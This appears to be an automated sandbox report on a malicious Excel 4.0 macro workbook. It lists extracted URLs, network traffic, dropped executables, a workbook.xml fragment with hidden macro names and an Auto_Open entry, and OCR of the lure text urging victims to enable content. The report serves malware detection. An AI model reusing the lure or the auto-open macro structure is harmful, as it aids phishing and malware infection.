      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://graph.windows.net
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://graph.windows.net/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://login.windows.local
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://management.azure.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://management.azure.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://messaging.office.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://officeapps.live.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://onedrive.live.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://outlook.office.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://repository.luxtrust.lu0
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://settings.outlook.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://tasks.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownHTTPS traffic detected: 50.87.232.245:443 -> 192.168.2.3:49722 version: TLS 1.2
      Source: fdcbn.exe, 00000001.00000002.252447191.0000023606250000.00000002.00000001.sdmpBinary or memory string: GetRawInputData
      Source: Yara matchFile source: Process Memory Space: fdcbn.exe PID: 4872, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: fdcbn.exe PID: 5384, type: MEMORY

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 13_ Once You have Enable Editing, please click "
      Source: Screenshot number: 4Screenshot OCR: Enable Content" 14 from the yellow bar above 15 16 17 18" WHY I CANNOT OPEN THIS DOCUMENT? 19
      Source: Screenshot number: 8Screenshot OCR: Enable Content O X A Share ::u':Sum " Zy JO Sort & Find & CL C ear FI ter Sc ect Editing ^ X
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: request_form_1611565093.xlsmInitial sample: CALL
      Office process drops PE fileShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\msdownld.tmp\AS01A87F.tmp\victory.phpJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\9ght3erd[1].exeJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\30ght3erd[1].exeJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\otrgh\sdgvjk\fdcbn.exeJump to dropped file
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C2AF01_2_00007FF7645C2AF0
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C17801_2_00007FF7645C1780
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BB7801_2_00007FF7645BB780
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BB9801_2_00007FF7645BB980
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C09801_2_00007FF7645C0980
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645CA9801_2_00007FF7645CA980
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645E35601_2_00007FF7645E3560
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645E4F701_2_00007FF7645E4F70
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645CBB701_2_00007FF7645CBB70
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B73501_2_00007FF7645B7350
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BA7301_2_00007FF7645BA730
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C13301_2_00007FF7645C1330
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C23301_2_00007FF7645C2330
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C1C001_2_00007FF7645C1C00
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B9C001_2_00007FF7645B9C00
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B88001_2_00007FF7645B8800
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B10001_2_00007FF7645B1000
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645FE2101_2_00007FF7645FE210
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BDFC21_2_00007FF7645BDFC2
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF764604B981_2_00007FF764604B98
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BA0801_2_00007FF7645BA080
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645FF0901_2_00007FF7645FF090
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B468D1_2_00007FF7645B468D
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B94601_2_00007FF7645B9460
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B5E401_2_00007FF7645B5E40
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BB0501_2_00007FF7645BB050
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645FDE501_2_00007FF7645FDE50
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B124B1_2_00007FF7645B124B
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645BAC301_2_00007FF7645BAC30
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645C37101_2_00007FF7645C3710
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B2F101_2_00007FF7645B2F10
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645E92D01_2_00007FF7645E92D0
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B32A01_2_00007FF7645B32A0
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645CA0A01_2_00007FF7645CA0A0
      Source: C:\otrgh\sdgvjk\fdcbn.exeCode function: 1_2_00007FF7645B52B01_2_00007FF7645B52B0
      Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9303"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="3" r:id="rId3"/></sheets><functionGroups builtInGroupCount="17"/><definedNames><definedName name="dontdoit" function="1" xlm="1" functionGroupId="9">-676986879</definedName><definedName name="okwell" function="1" xlm="1" functionGroupId="9">124715010</definedName><definedName name="plzno" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="_xlnm.Auto_Open">'Doc1'!$AA$6</definedName></definedNames><calcPr calcId="122211"/></workbook>
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpBinary or memory string: FPicturesVideosCommunicationsInternetUsersLibrariesUserFilesDocumentsCompressedFolder@shell32.dll,-34829@shell32.dll,-34830@shell32.dll,-34831@shell32.dll,-34832@shell32.dll,-34824@shell32.dll,-34825@shell32.dll,-34826@shell32.dll,-34827@shell32.dll,-34820@shell32.dll,-34821@shell32.dll,-34822@shell32.dll,-34823OpenSearch@shell32.dll,-34817@shell32.dll,-34818@shell32.dll,-34819@shell32.dll,-34828@shell32.dll,-34837@shell32.dll,-34838@shell32.dll,-34836@shell32.dll,-34839@shell32.dll,-34840@shell32.dll,-34835AppJscriptJavascriptResLDAPFileExplorer.ZipSelectionIerssIehistoryExplorer.BurnSelectionExplorer.AssocProtocol.search-msExplorer.EraseDiscExplorer.CloseSessionExplorer.AssocActionId.CloseSessionExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.ZipSelectionExplorer.AssocActionId.EraseDisc.appref-ms.application.bas.asp.adeWMP11.AssocProtocol.MMS.app.adpwindowsmediacenterappVbscriptwindowsmediacenterwebwindowsmediacentersslStickyNotesrlogintn3270telnet.hta.hpj.isp.ins.grp.gadget.hme.hlp.crt.crds.fxp.csh.cpf.cnt.crd.cpl.maw.mav.mda.mcf.mas.mar.mau.mat.mag.maf.maq.mam.jse.its.mad.ksh.pcd.ops.plg.pl.msh2xml.msh2.mst.mshxml.msh.msc.msh1xml.msh1.mdt.mde.mdz.mdw.rbw.rb.rgu.rdp.pyo.pyc.plsc.pvw.ps2xml.ps2.py.psc2.prg.prf.provxml.printerexport.wsc.ws.xaml.wsh.vsmacros.vbp.webpnp.vsw.tsk.theme.vbe.vb.scr.scf.shs.shb.xip.xdp.xnk`
      Source: classification engineClassification label: mal80.expl.evad.winXLSM@5/15@1/4
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\otrgh\sdgvjk\fdcbn.exeMutant created: \Sessions\1\BaseNamedObjects\DOBLRPWBUQFD
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A6CD0287-F39E-46CD-979D-EA2876FB904D} - OProcSessId.datJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\otrgh\sdgvjk\fdcbn.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
      Source: unknownProcess created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe'
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe' Jump to behavior
      Source: C:\otrgh\sdgvjk\fdcbn.exeProcess created: C:\otrgh\sdgvjk\fdcbn.exe 'C:\otrgh\sdgvjk\fdcbn.exe' Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: request_form_1611565093.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
      Source: request_form_1611565093.xlsmInitial sample: OLE zip file path = xl/media/image1.png
      Source: request_form_1611565093.xlsmInitial sample: OLE zip file path = xl/media/image2.png
      Source: request_form_1611565093.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
      Source: request_form_1611565093.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Source: Binary string: kernel32.pdbUGP source: fdcbn.exe, 00000001.00000002.251787155.0000023605F60000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501537228.000001DEF09A0000.00000002.00000001.sdmp
      Source: Binary string: dnsapi.pdbUGP source: fdcbn.exe, 00000001.00000002.251864694.0000023606010000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.501906744.000001DEF0A50000.00000002.00000001.sdmp
      Source: Binary string: wininet.pdb source: fdcbn.exe, 00000001.00000002.259081379.00000236079B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.508856779.000001DEF23E0000.00000002.00000001.sdmp
      Source: Binary string: ws2_32.pdb source: fdcbn.exe, 00000001.00000002.252045574.00000236061B0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504093786.000001DEF0DB0000.00000002.00000001.sdmp
      Source: Binary string: bcrypt.pdb source: fdcbn.exe, 00000001.00000002.251361547.0000023605B70000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.499969051.000001DEEEC10000.00000002.00000001.sdmp
      Source: Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb(7`d source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp
      Source: Binary string: D:\projects\source\repos\7\dl7\Bin\x64\Release_nologs\qitx64.pdb source: fdcbn.exe, 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp, fdcbn.exe, 00000003.00000002.510687772.00007FF76460E000.00000002.00020000.sdmp, 9ght3erd[1].exe.0.dr
